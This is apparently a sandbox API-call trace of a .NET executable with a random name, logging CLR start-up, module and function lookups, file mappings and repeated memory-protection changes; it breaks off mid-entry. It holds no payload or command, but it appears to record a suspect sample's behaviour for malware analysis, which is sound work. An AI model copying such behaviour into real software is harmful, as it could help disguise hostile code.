0x76d6918b [0062.021] GetProcAddress (hModule=0x76d30000, lpProcName="CreateBoundaryDescriptorW") returned 0x76d5ec09 [0062.024] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePrivateNamespaceW") returned 0x76d60a8d [0062.026] GetProcAddress (hModule=0x76d30000, lpProcName="OpenPrivateNamespaceW") returned 0x76d6b0a4 [0062.030] SysReAllocStringLen (in: pbstr=0x41ee98*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x41ee98*="advapi32") returned 1 [0062.030] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0062.030] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0062.030] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0062.030] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0062.031] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] ResetEvent (hEvent=0xb8) returned 1 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] ResetEvent (hEvent=0xb8) returned 1 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] SetEvent (hEvent=0xbc) returned 1 [0062.031] SetEvent (hEvent=0xb8) returned 1 [0062.031] CloseHandle (hObject=0x148) returned 1 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] ResetEvent (hEvent=0xb8) returned 1 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.031] GetCurrentThreadId () returned 0xba4 [0062.032] GetCurrentThreadId () returned 0xba4 [0062.032] ResetEvent (hEvent=0xb8) returned 1 [0062.032] GetCurrentThreadId () returned 0xba4 [0062.032] GetCurrentThreadId () returned 0xba4 [0062.032] SetEvent (hEvent=0xbc) returned 1 [0062.032] SetEvent (hEvent=0xb8) returned 1 [0062.032] CloseHandle (hObject=0x140) returned 1 [0062.032] GetProcAddress (hModule=0x77710000, lpProcName="InitializeAcl") returned 0x777245cd [0062.032] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0062.032] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0062.033] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x6e3f28, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10000, lpName="Cor_CLR_WRITER\\Cor_SxSPublic_IPCBlock") returned 0x148 [0062.033] GetCurrentThreadId () returned 0xba4 [0062.033] ResetEvent (hEvent=0xb8) returned 1 [0062.033] GetCurrentThreadId () returned 0xba4 [0062.033] GetCurrentThreadId () returned 0xba4 [0062.033] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] ResetEvent (hEvent=0xb8) returned 1 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] SetEvent (hEvent=0xbc) returned 1 [0062.034] SetEvent (hEvent=0xb8) returned 1 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] GetCurrentThreadId () returned 0xba4 [0062.034] SetEvent (hEvent=0xbc) returned 1 [0062.034] MapViewOfFile (hFileMappingObject=0x148, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x150000 [0062.035] SysReAllocStringLen (in: pbstr=0x41f078*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41f078*="kernel32.dll") returned 1 [0062.035] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.035] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0062.037] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteBoundaryDescriptor") returned 0x77c6e66d [0062.051] SysReAllocStringLen (in: pbstr=0x41f310*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41f310*="kernel32") returned 1 [0062.051] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.051] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0062.053] GetProcAddress (hModule=0x76d30000, lpProcName="WerRegisterRuntimeExceptionModule") returned 0x76dce065 [0062.056] SysReAllocStringLen (in: pbstr=0x41f020*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41f020*="kernel32.dll") returned 1 [0062.056] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.057] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0062.059] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0062.061] SysReAllocStringLen (in: pbstr=0x41f560*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x41f560*="mscoree.dll") returned 1 [0062.061] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0062.061] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x75620000 [0062.061] GetProcAddress (hModule=0x75620000, lpProcName=0x18) returned 0x75628017 [0062.061] GetProcAddress (hModule=0x754f0000, lpProcName=0x18) returned 0x754fd902 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] ResetEvent (hEvent=0xb8) returned 1 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] ResetEvent (hEvent=0xb8) returned 1 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] GetCurrentThreadId () returned 0xba4 [0062.062] SetEvent (hEvent=0xbc) returned 1 [0062.062] SetEvent (hEvent=0xb8) returned 1 [0062.063] CloseHandle (hObject=0x0) returned 0 [0062.064] SysReAllocStringLen (in: pbstr=0x41f380*=0x0, psz="api-ms-win-core-memory-l1-1-0.dll", len=0x21 | out: pbstr=0x41f380*="api-ms-win-core-memory-l1-1-0.dll") returned 1 [0062.064] CharLowerBuffW (in: lpsz="api-ms-win-core-memory-l1-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-memory-l1-1-0.dll") returned 0x21 [0062.064] GetModuleHandleW (lpModuleName="api-ms-win-core-memory-l1-1-0.dll") returned 0x76c10000 [0062.064] SysReAllocStringLen (in: pbstr=0x41f380*=0x0, psz="api-ms-win-core-libraryloader-l1-1-0.dll", len=0x28 | out: pbstr=0x41f380*="api-ms-win-core-libraryloader-l1-1-0.dll") returned 1 [0062.064] CharLowerBuffW (in: lpsz="api-ms-win-core-libraryloader-l1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-core-libraryloader-l1-1-0.dll") returned 0x28 [0062.064] GetModuleHandleW (lpModuleName="api-ms-win-core-libraryloader-l1-1-0.dll") returned 0x76c10000 [0062.065] SysReAllocStringLen (in: pbstr=0x41f380*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41f380*="ntdll.dll") returned 1 [0062.065] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0062.065] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0062.065] GetProcAddress (hModule=0x76c10000, lpProcName="SetSystemFileCacheSize") returned 0x0 [0062.091] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetSystemInformation") returned 0x77c61bd4 [0062.091] GetProcAddress (hModule=0x76c10000, lpProcName="PrivIsDllSynchronizationHeld") returned 0x0 [0062.096] SysReAllocStringLen (in: pbstr=0x41f518*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41f518*="kernel32") returned 1 [0062.096] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.096] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0062.098] GetProcAddress (hModule=0x76d30000, lpProcName="AddDllDirectory") returned 0x0 [0062.394] SysReAllocStringLen (in: pbstr=0x41e980*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41e980*="kernel32.dll") returned 1 [0062.394] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.394] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0062.397] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0062.403] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x22c [0062.404] GetLastError () returned 0x0 [0062.404] SysReAllocStringLen (in: pbstr=0x41ea28*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x41ea28*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0062.404] GetThreadLocale () returned 0x409 [0062.404] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0062.404] GetThreadLocale () returned 0x409 [0062.404] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0062.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41e7ac, lpFilePart=0x41e7a8 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", lpFilePart=0x41e7a8*="mscorlib.ni.dll.aux") returned 0x6c [0062.404] SysReAllocStringLen (in: pbstr=0x41ea28*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x41ea28*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0062.404] SysReAllocStringLen (in: pbstr=0x41e9d8*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x41e9d8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0062.404] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", cchLength=0x6c | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 0x6c [0062.404] SysReAllocStringLen (in: pbstr=0x41ea28*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x41ea28*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0062.405] SetLastError (dwErrCode=0x0) [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] SetEvent (hEvent=0xbc) returned 1 [0062.405] GetFileSize (in: hFile=0x22c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] GetCurrentThreadId () returned 0xba4 [0062.405] SetEvent (hEvent=0xbc) returned 1 [0062.405] ReadFile (in: hFile=0x22c, lpBuffer=0x41eb40, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x41eadc, lpOverlapped=0x0 | out: lpBuffer=0x41eb40*, lpNumberOfBytesRead=0x41eadc*=0xb0, lpOverlapped=0x0) returned 1 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] ResetEvent (hEvent=0xb8) returned 1 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] ResetEvent (hEvent=0xb8) returned 1 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] GetCurrentThreadId () returned 0xba4 [0062.406] SetEvent (hEvent=0xbc) returned 1 [0062.406] SetEvent (hEvent=0xb8) returned 1 [0062.406] CloseHandle (hObject=0x22c) returned 1 [0062.410] SysReAllocStringLen (in: pbstr=0x41dfe0*=0x0, psz="mscorlib.ni.dll", len=0xf | out: pbstr=0x41dfe0*="mscorlib.ni.dll") returned 1 [0062.410] CharLowerBuffW (in: lpsz="mscorlib.ni.dll", cchLength=0xf | out: lpsz="mscorlib.ni.dll") returned 0xf [0062.410] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x72f60000 [0062.626] GetLastError () returned 0x0 [0062.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0062.695] GetLastError () returned 0x0 [0062.695] SysReAllocStringLen (in: pbstr=0x41eaa0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41eaa0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0062.695] GetThreadLocale () returned 0x409 [0062.695] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0062.695] GetThreadLocale () returned 0x409 [0062.695] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0062.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", nBufferLength=0x104, lpBuffer=0x41e824, lpFilePart=0x41e820 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFilePart=0x41e820*="WAQro5oWEZAnSlij.exe") returned 0x3a [0062.695] SysReAllocStringLen (in: pbstr=0x41eaa0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41eaa0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0062.695] SysReAllocStringLen (in: pbstr=0x41ea50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ea50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0062.695] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchLength=0x3a | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 0x3a [0062.695] SysReAllocStringLen (in: pbstr=0x41eaa0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0x41eaa0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] ResetEvent (hEvent=0xb8) returned 1 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] ResetEvent (hEvent=0xb8) returned 1 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] GetCurrentThreadId () returned 0xba4 [0062.696] SetEvent (hEvent=0xbc) returned 1 [0062.696] SetEvent (hEvent=0xb8) returned 1 [0062.696] SetLastError (dwErrCode=0x0) [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] ResetEvent (hEvent=0xb8) returned 1 [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] ResetEvent (hEvent=0xb8) returned 1 [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] GetCurrentThreadId () returned 0xba4 [0062.697] SetEvent (hEvent=0xbc) returned 1 [0062.697] SetEvent (hEvent=0xb8) returned 1 [0062.697] CloseHandle (hObject=0x1f8) returned 1 [0062.741] SysReAllocStringLen (in: pbstr=0x41ec28*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x41ec28*="ole32.dll") returned 1 [0062.741] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0062.741] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0062.757] GetLastError () returned 0x7e [0062.757] SetLastError (dwErrCode=0x7e) [0062.757] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ad4, cbMultiByte=9, lpWideCharStr=0x41e104, cchWideChar=2047 | out: lpWideCharStr="ole32.dll") returned 9 [0062.757] SysReAllocStringLen (in: pbstr=0x41f108*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x41f108*="ole32.dll") returned 1 [0062.757] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0062.757] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0062.758] GetLastError () returned 0x0 [0062.758] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766214a0, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x4, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x20) returned 0x0 [0062.758] GetCurrentProcess () returned 0xffffffff [0062.758] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766214a0, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x20, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x4) returned 0x0 [0062.759] GetCurrentProcess () returned 0xffffffff [0062.759] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766214b0, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x4, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x20) returned 0x0 [0062.759] GetCurrentProcess () returned 0xffffffff [0062.759] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766214b0, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x20, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x4) returned 0x0 [0062.759] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766219a8, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x4, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x20) returned 0x0 [0062.760] GetCurrentProcess () returned 0xffffffff [0062.760] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766219a8, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x20, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x4) returned 0x0 [0062.760] GetCurrentProcess () returned 0xffffffff [0062.760] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766219ac, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x4, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x20) returned 0x0 [0062.760] GetCurrentProcess () returned 0xffffffff [0062.760] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x766219ac, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x20, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x4) returned 0x0 [0062.761] GetCurrentProcess () returned 0xffffffff [0062.761] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x76621a00, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x4, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x20) returned 0x0 [0062.761] GetCurrentProcess () returned 0xffffffff [0062.761] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f0f4*=0x76621a00, NumberOfBytesToProtect=0x41f0f8, NewAccessProtection=0x20, OldAccessProtection=0x41f12c | out: BaseAddress=0x41f0f4*=0x76621000, NumberOfBytesToProtect=0x41f0f8, OldAccessProtection=0x41f12c*=0x4) returned 0x0 [0062.761] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0062.899] SysReAllocStringLen (in: pbstr=0x41e574*=0x0, psz="clrjit.dll", len=0xa | out: pbstr=0x41e574*="clrjit.dll") returned 1 [0062.899] CharLowerBuffW (in: lpsz="clrjit.dll", cchLength=0xa | out: lpsz="clrjit.dll") returned 0xa [0062.899] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", hFile=0x0, dwFlags=0x8) returned 0x75370000 [0063.064] GetLastError () returned 0x7e [0063.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e55c*=0x753de00c, NumberOfBytesToProtect=0x41e560, NewAccessProtection=0x4, OldAccessProtection=0x41e594 | out: BaseAddress=0x41e55c*=0x753de000, NumberOfBytesToProtect=0x41e560, OldAccessProtection=0x41e594*=0x2) returned 0x0 [0063.065] GetCurrentProcess () returned 0xffffffff [0063.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e55c*=0x753de00c, NumberOfBytesToProtect=0x41e560, NewAccessProtection=0x2, OldAccessProtection=0x41e594 | out: BaseAddress=0x41e55c*=0x753de000, NumberOfBytesToProtect=0x41e560, OldAccessProtection=0x41e594*=0x4) returned 0x0 [0063.065] GetCurrentProcess () returned 0xffffffff [0063.065] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e55c*=0x753de050, NumberOfBytesToProtect=0x41e560, NewAccessProtection=0x4, OldAccessProtection=0x41e594 | out: BaseAddress=0x41e55c*=0x753de000, NumberOfBytesToProtect=0x41e560, OldAccessProtection=0x41e594*=0x2) returned 0x0 [0063.066] GetCurrentProcess () returned 0xffffffff [0063.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e55c*=0x753de050, NumberOfBytesToProtect=0x41e560, NewAccessProtection=0x2, OldAccessProtection=0x41e594 | out: BaseAddress=0x41e55c*=0x753de000, NumberOfBytesToProtect=0x41e560, OldAccessProtection=0x41e594*=0x4) returned 0x0 [0063.066] GetCurrentProcess () returned 0xffffffff [0063.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e55c*=0x753de054, NumberOfBytesToProtect=0x41e560, NewAccessProtection=0x4, OldAccessProtection=0x41e594 | out: BaseAddress=0x41e55c*=0x753de000, NumberOfBytesToProtect=0x41e560, OldAccessProtection=0x41e594*=0x2) returned 0x0 [0063.066] GetCurrentProcess () returned 0xffffffff [0063.066] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e55c*=0x753de054, NumberOfBytesToProtect=0x41e560, NewAccessProtection=0x2, OldAccessProtection=0x41e594 | out: BaseAddress=0x41e55c*=0x753de000, NumberOfBytesToProtect=0x41e560, OldAccessProtection=0x41e594*=0x4) returned 0x0 [0063.067] GetProcAddress (hModule=0x75370000, lpProcName="getJit") returned 0x753bf70e [0063.097] GetProcAddress (hModule=0x75620000, lpProcName="GetProcessExecutableHeap") returned 0x756289ec [0063.098] GetProcAddress (hModule=0x754f0000, lpProcName="GetProcessExecutableHeap_RetAddr") returned 0x0 [0063.098] GetProcAddress (hModule=0x754f0000, lpProcName="GetProcessExecutableHeap") returned 0x754f1ca5 [0063.103] CreateFileW (lpFileName="C:\\Windows\\assembly\\pubpol109.dat" (normalized: "c:\\windows\\assembly\\pubpol109.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0063.104] GetLastError () returned 0x0 [0063.104] SysReAllocStringLen (in: pbstr=0x41b098*=0x0, psz="C:\\Windows\\assembly\\pubpol109.dat", len=0x21 | out: 